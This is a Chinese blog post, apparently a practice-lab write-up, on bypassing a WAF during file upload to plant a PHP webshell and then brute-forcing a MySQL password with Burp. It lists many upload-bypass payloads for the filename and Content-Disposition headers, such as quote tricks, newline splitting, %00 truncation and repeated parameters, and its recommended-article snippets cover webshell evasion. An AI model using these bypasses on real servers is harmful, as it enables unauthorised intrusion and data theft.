记一次上传webshell绕过waf以及爆破数据库

最新推荐文章于 2024-08-08 10:48:47 发布
最新推荐文章于 2024-08-08 10:48:47 发布
阅读量1.1k 收藏 3
点赞数
分类专栏: 文件上传漏洞 爆破 绕过waf 文章标签: 安全漏洞 mysql php 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54429231/article/details/118568584
版权

记一次上传webshell绕过waf以及爆破数据库

本人使用的是靶场,我是来研究如何绕过waf
在这里插入图片描述
先查看代码,发现第一关是前端验证,那么就是上传一个带有webshell的后门图片
在这里插入图片描述
上传,使用burp抓取数据包,更改后缀
在这里插入图片描述
在这里插入图片描述
然后放包,发现到了waf
在这里插入图片描述
现在试试绕过waf
绕过waf有两种方法:
一.让waf检测不到你的脚本后缀(这里我使用的是php)
二.使用其它的脚本去上传,也能执行php代码

这里我使用第一种方法(第一种方法里面有很多小方法):

数据溢出-防匹配(xxxx……)
不断去匹配数据,数据量特别大的时候,waf程序就会崩溃,或者截至在哪里,网上也叫:垃圾数据

符号变异-防匹配(’ " ;)

Content-Disposition: form-data; 
 name="upload_file";     filename="webshell.php" Content-Type: image/jpe
有的使用了双引号和等于,而有的使用了( :),没有使用双引号的那就是自带的属性

1.在 filename="webshell.jpg"没有引号相当于连接后面的数据,可以测试去加上( ;)去变成两行数据
2.或者改成单引号
 filename='webshell.php'
或
 filename="webshell.php //这样会把"webshell当作名字"webshell.php
这样会有三种情况(没有闭合数据,waf会认为是错误数据)
1.匹配到"webshell.php
2.匹配到webshell.php
3.匹配不到
但是在后面加上 " 绕不过  filename=webshell.php",因为安全狗是截取引号前面的字符
或者
 filename=webshell.php 
或者
 filename="webshell"webshell.php  //因为waf是截取引号前面的字符
关键是找到waf过滤关键字

数据溢出-防匹配(xxxx……)

 filename="webshell.php%00.jpg "
 filename="webshell.jpg;.php" 
//waf以为是(;)截断了,而数据包把这个当成了完整的数据
换行:
 filename="webshell.p
 h
p"
安全狗认为是( p\nh\np\n" )被\n干扰了,

重复数据-防匹配(参数多次)

. 
filename="x.jpg" ; filename="y.jpg";  //会以y.jpg为主 ,多弄几个
 filename="x.jpg" ; filename="y.jpg";  filename="x.jpg" ; filename="y.jpg";  filename="x.jpg" ; filename="y.jpg";  filename="x.jpg" ; filename="y.jpg";  filename="x.jpg" ; filename="y.jpg";  filename="x.jpg" ; filename="y.jpg";  filename="x.jpg" ; filename="y.jpg";  filename="x.jpg" ; filename="y.jpg";  filename="x.jpg" ; filename="y.jpg";  filename="x.jpg" ; filename="y.jpg";  filename="x.jpg" ; filename="y.jpg";  filename="x.jpg" ; filename="y.php";
这样可以绕过, 
 
二.
Content-Disposition: form-data; name="upload_file"; 
filename="Content-Disposition: form-data; name="upload_file"; x.php"
 Content-Type: image/jpeg
waf会认为x.php没有给到参数,
 
或
Content-Disposition: form-data; name="upload_file"; 
filename=" Content-Type: image/jpe; x.php"
 Content-Type: image/jpeg
 
或
 
Content-Disposition: form-data; name="upload_file"; 
filename=" /jpeg; x.php"
 Content-Type: image/jpe

Fuzz web字典
可以使用字典去爆破
在这里插入图片描述
看看那个能成功最后
在这里插入图片描述

这里我使用数据溢出
数据溢出-防匹配(xxxx……)的方法
在这里插入图片描述
改成
在这里插入图片描述

上传成功,然后使用蚁剑去连接webshell
在这里插入图片描述
图片地址
在这里插入图片描述
在这里插入图片描述
进入网站目录成功
在这里插入图片描述
现在去爆破数据库,点击检测,发现了三个数据库,我们使用mysql进行爆破
在这里插入图片描述
设置代理,使用burp去爆破数据库密码
在这里插入图片描述
在这里插入图片描述
使用狙击手模式
在这里插入图片描述

在这里插入图片描述
爆破成功
在这里插入图片描述
现在连接数据库
在这里插入图片描述
打开数据库
在这里插入图片描述
ok成功,但是在服务器上面还是被找到了,没有免杀,不是我不想免杀,是我还不会,但是总体思路是正确的,这个被找到是因为,爆破数据库的原因,被waf检测到流量访问异常
在这里插入图片描述

天工开物实验室
关注
专栏目录
山石面试题—Hillstone(山石)靶机渗透(绕waf 基于Cookie注入)
afei001
11-15 4843
目录 1.前言 2.信息搜集 3.SQLmap探测 4.SQLmap tamper脚本爆库 (1)SQLmap爆数据库 (2)SQLmap爆表 (3)SQLmap爆字段 (4)SQLmap爆出email和password 5.拿下后台 6.总结 1.前言 前两天在一个QQ群里某位大佬发了一个山石网科的靶机,闲来无事,咋也练练手不是。后来听说是某个兄弟去山石面试做的一个题。 afei 打开网站瞅瞅,在about页面看到了规则(提示)。 ...
WEB渗透学习笔7——webshell上传绕过
林林木林林L的博客
08-01 3344
webshell 概念 web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,WebShell是一种用来进行网站和服务器管理的脚本程序,webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据库,甚至可以调用一些服务器上系统的相关命令(比如创建用户,修改删除文件之类的),通常被黑客利用,黑客通过一些上传方式,将自己编写的webshell上传web服务器的页面的目录下,攻击者通过上传WebShell获得Web
一次上传绕过
qq_46804551的博客
04-20 75
闲着没事就测测站,第一次拿到shell心里属实很激动啊 弱口令登进后台,找到上传点抓包,熟练得操作 尼玛还有这种,菜鸡得我直接慌了,沉思了一会想应该是content-type在作怪 随手一波百度 直接修改content-type:multipart/form-data 成功 上蚁剑 成功,菜鸡终于拿到shell了,太激动了 ...
什么,有狗快跑!慢着,这次手把手教你怎么过安全狗!(sql注入篇)_sql注入绕最新安全
最新发布
heike_Ch的博客
08-08 815
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
Upload-labs Pass01 WebShell的简单绕过上传
qq_44846097的博客
12-04 220
【Upload-labs Pass01】更改脚本后缀绕过
小识.htaccess文件
aijie6150的博客
10-18 316
.htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过ht...
Upload-labs Pass02 WebShell的简单绕过上传
qq_44846097的博客
12-05 3175
【Upload-labs Pass02】更改上传类型绕过
WEB渗透测试数据库
04-01
# 文件转换,转换为utf-16-bom类型文件(jsp/aspx的utf-16-bom类型文件可绕过一些安全软件) pen.py file cmd.jsp -c dst.jsp@utf-16-bom # 制作图片木马,会生成caidao_hiddenin_aa.jpg pen.py file caidao....
23个常见Webshell网站管理工具
weixin_54787877的博客
03-20 5312
注 文章来源:“潇湘信安”公众号 这篇文章笔者整理了目前所见到过的大部分Webshell网站管理工具,这里只对这些工具做了简单介绍,并没有写具体使用方式,大家如果有兴趣可以自己去看一下使用说明,同时也欢迎大家补充一些类似工具。 目前国内安全人员常用的有:中国菜刀、中国蚁剑、冰蝎、哥斯拉、Metasploit、SharPyShell等,也有一些内部团队开发的类似工具,但是并没有对外公开。 (1) 中国菜刀(Chopper) 中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2414
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马的免杀。Webshell检测方式网上有很多免杀的一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
安服面试点总结
1
02-22 8779
目录 3389无法连接的几种情况 二次注入 报错注入的函数 基于格式错误的报错(xpath语法错误) 基于主键重复错误 堆叠注入 判断出网站的CMS对渗透的意义 一个成熟并且相对安全的CMS,渗透时扫目录的意义? mysql注入点,用工具对目标站直接写入一句话,需要哪些条件? 1.3389无法连接的几种情况 端口没有开放 端口被修改了 被拦截了 没出网(处于内网(需要进行端口转发)) 2.二次注入 恶意数据经过一些转义函数(get_magic_quotes_gpc)的
数据库备份批量拿站的WEBSHELL
07-15
数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL数据库备份批量拿站的WEBSHELL
Upload-labs Pass07-Pass10 WebShell的简单绕过上传
qq_44846097的博客
01-03 2740
Pass07 绕过思路:后缀添加“.”绕过。 Pass08 绕过思路:后缀添加“::$DATA绕过”大小写绕过。 Pass09 绕过思路:后缀添加“. .”点空格点绕过。 Pass10 绕过思路:后缀更改".pphpphp"绕过
WebShell 木马免杀过WAF
悦分享
08-02 640
什么是WAFWafweb应用防火墙(WebApplicationFirewa‖l)的简称,对来自Web应用程序客户端的各类请求进行内容检测和验证,确保其安全性与合法性,对非法的请求予以实时阻断,为web应用提供防护,也称作应用防火墙,是网络安全纵深防御体系里重要的一环。waf属于检测型及纠正型防御控制措施。waf分为硬件waf、软件waf(ModSecurity)、代码级wafWAF的原理waf对请求的内容进行规则匹配、行为分析等识别出恶意行为,并执行相关动作,这些动作包括阻断、录、告警等。...
WAF自动化暴破(绕过)脚本xwaf
weixin_34208283的博客
08-01 505
xwaf xwaf是一个python写的waf自动绕过工具,上一个版本是bypass_waf,xwaf相比bypass_waf更智能,可无人干预,自动暴破waf Disclaimer [!]legaldisclaimer:Usageof3xp10it.pyandweb.pyforattackingtargetswithou...
waf绕过之标签绕过
weixin_50464560的博客
10-15 978
在内容绕过waf拦截上,一般有两种思路。 第一种是在代码上想办法,各种混淆代码,或者放弃特征明显的eval,使用特征不那么明显的命令执行,远程文件包含,文件上传,反序列化。 但有的waf会直接从脚本文件的标签特征上下手,这个时候就需要用到第二种办法,使用脚本文件的特性来规避标签特征。 1, php特殊标签 1 <?php phpinfo();?> 2 <script language='php'>phpinfo();</script> 3 <?=phpinfo()?
[web安全-文件上传漏洞解析,及常见绕过方式]简单易懂超友好
m0_73033023的博客
04-20 2712
有时候服务器会对上传上去的图片进行二次渲染,生成一张新的图片,从而过滤掉webshell脚本,这时只需要将渲染后的图片与渲染前的图片进行对比,查看二者相同的地方,也就是渲染未改动的地方,在此处插入webshell脚本即可,网上推荐用gif图片。如果程序里面存在这种漏洞,那么恶意攻击者可以直接向你的服务器上传一个 webshell( 又称 ASP 木马、PHP 木马、JAVA木马等即利用服务器端的文件操作语句写成的动态网页,可以用来编辑你服务器上的文件 ),从而控制你的网站。
webshell_某系统绕过waf拿下webshell
weixin_42401178的博客
12-26 614
文章来源:安全先师前言对于一个不怎么拿站的我来说搞一次站点确实费劲。前不久拿了一个站点。分享一下粗略过程。正文小伙伴所在的地方要让搞某系统测试,发到群里让看看。我看了一波貌似没有什么洞洞这让我,想起三年前的某系统的算算术的漏洞于是,想搞一份源代码研究一下这个算算术的这个东东于是操起神器在fofa上找到一个站的可以算算术接下来掏出exp就开始怼。结果显示如下。连接被重置了想到的是某x云。结...
利用工具改造webshell绕过WAF
永远是少年
02-01 1938
今天继续给大家介绍渗透测试相关知识,本文主要内容是利用工具改造webshell绕过WAF。 一、利用enphp改造webshell 二、利用网页版PHP加密改造webshell 三、利用webshell-venom改造webshell
phpwaf绕过select,录与分享PHP WebShell 绕过WAF 的一些经验
05-21
绕过 WAF 的方式有很多种,其中一种常见的方式是使用 WebShell。以下是一些 PHP WebShell 绕过 WAF经验: 1. 使用 Base64 编码:将 WebShell 代码使用 Base64 编码,然后在需要执行的地方使用 eval 函数解码并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值